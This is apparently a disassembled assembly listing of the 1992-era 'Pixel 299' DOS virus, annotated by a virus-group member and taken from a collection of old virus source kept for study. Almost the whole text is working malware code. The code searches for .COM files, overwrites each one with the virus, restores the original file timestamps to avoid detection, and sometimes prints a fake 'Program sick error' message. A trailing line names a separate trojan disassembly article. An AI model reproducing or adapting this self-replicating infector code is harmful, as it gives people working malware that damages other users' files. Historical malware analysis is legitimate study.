299.asm

More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use

;*****************************************************************************
;
; Pixel - 299 virus
;
; Disassembled By Admiral Bailey [YAM '92]
;
; Notes: I dont know where the hell I got this one from but when I found it on
;        one of my disks it was named incorectly.  Some Amst shit but I looked
;        it up in the vsum and its named as Pixel so Il use that name.
;        Anyways its just a plain com infecting virus that displays a messege
;        when executed. Nothing big.
;
;*****************************************************************************

data_1e         equ     6Ch
data_2e         equ     96h
data_3e         equ     98h
data_4e         equ     9Eh
data_15e        equ     12Bh                    ;*
data_16e        equ     12Dh                    ;*

seg_a           segment byte public
                assume  cs:seg_a, ds:seg_a


                org     100h

Pixel           proc    far

start:
                jmp     short begin
                dw      5649h
data_7          db      0
data_8          db      2Ah, 2Eh, 43h, 4Fh, 4Dh, 0      ; '*.com'
data_10         dw      0, 8918h
data_12         dw      0

begin:                                          ; loc_1:
                push    ax
                mov     ax,cs
                add     ax,1000h
                mov     es,ax
                inc     data_7
                mov     si,100h
                xor     di,di                   ; Zero register
                mov     cx,12Bh
                rep     movsb                   ; Mov [si] to es:[di]
                mov     dx,offset data_8        ; load the type of file to find
                mov     cx,6                    ; Im not sure what attrib
                mov     ah,4Eh                  ; Find first file
                int     21h                     ;

                jc      quit                    ; if none found then...
get_file:                                       ; loc_2
                mov     dx,data_4e              ; file name
                mov     ax,3D02h                ; open file
                int     21h

                mov     bx,ax
                push    es
                pop     ds
                mov     dx,data_15e             ; buffer for read
                mov     cx,0FFFFh               ; number of bytes to read
                mov     ah,3Fh                  ; read file
                int     21h

                add     ax,12Bh
                mov     cs:data_12,ax
                cmp     word ptr ds:data_16e,5649h ; probably comparing size
                je      not_this_file           ; of file
                xor     cx,cx                   ; Zero register
                mov     dx,cx
                mov     ax,4200h                ; move file pointer
                int     21h                     

                jc      not_this_file           ; if error the quit this file
                xor     dx,dx                   ; Zero register
                mov     cx,cs:data_12
                mov     ah,40h                  ; write virus to file
                int     21h

                mov     cx,cs:data_2e           ; old date
                mov     dx,cs:data_3e           ; new time
                mov     ax,5701h                ; set files date & time
                int     21h                     

not_this_file:                                  ; loc_3:
                mov     ah,3Eh                  ; close this file
                int     21h

                push    cs
                pop     ds
                mov     ah,4Fh                  ; find another file
                int     21h                     
                                                
                jc      quit                    ; if none found quit
                jmp     short get_file          ; if found then infect
quit:                                           ; loc_4
                cmp     data_7,5
                jb      loc_5                   ; Jump if below
                mov     ax,40h
                mov     ds,ax
                mov     ax,ds:data_1e
                push    cs
                pop     ds
                and     ax,1
                jz      loc_5                   ; Jump if zero
                mov     dx,offset data_13       ; gets the messege
                mov     ah,9                    ; display string
                int     21h

                int     20h                     ; Quit program

data_13         db      'Program sick error:Call doctor o'  ; messege
                db      'r buy PIXEL for cure description'  ; displayed when
                db      0Ah, 0Dh, '$'                       ; run
loc_5:
                mov     si,offset data_14
                mov     cx,22h
                xor     di,di                   ; Zero register
                rep     movsb                   ; Rep when cx >0 Mov [si] to es
                pop     bx
                mov     cs:data_10,0
                mov     word ptr cs:data_10+2,es
                jmp     dword ptr cs:data_10

data_14         db      1Eh                             ; cant figure this
                db       07h,0BEh, 2Bh, 02h,0BFh, 00h   ; part out...
                db       01h,0B9h,0FFh,0FFh, 2Bh,0CEh   ; probably infected
                db      0F3h,0A4h, 2Eh,0C7h, 06h, 00h   ; file before.
                db       01h, 00h, 01h, 2Eh, 8Ch, 1Eh
                db       02h, 01h, 8Bh,0C3h, 2Eh,0FFh
                db       2Eh, 00h, 01h,0CDh             ; this is an int 20h
                db      20h

Pixel           endp

seg_a           ends

                end     start


哪哪哪哪耐屯屯屯屯>>> Article From Evolution #1 - YAM '92

Article Title: Thrasher Trojan Disassembly
Author: Natas Kaupas